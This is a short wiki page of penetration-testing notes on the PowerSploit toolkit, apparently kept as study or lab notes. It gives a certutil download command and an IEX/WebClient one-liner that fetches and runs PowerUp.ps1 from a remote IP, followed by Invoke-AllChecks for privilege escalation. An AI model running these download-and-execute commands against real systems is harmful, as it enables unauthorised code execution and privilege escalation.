Skip to content

PowerSploit

lethanhtung01011980 edited this page Apr 22, 2020 · 6 revisions

Goals

  • PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
  • To check and PoE!!!
  • If PowerShell is unrestricted!

Ref

Sample usage

Download and run

  • Can download but not able to run: certutil.exe -urlcache -split -f http://192.168.136.133/PowerUp.ps1 PowerUp.ps1
  • PS > IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14/PowerUp.ps1')
  • Invoke-AllChecks <=================== Check for PoE!!!!

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally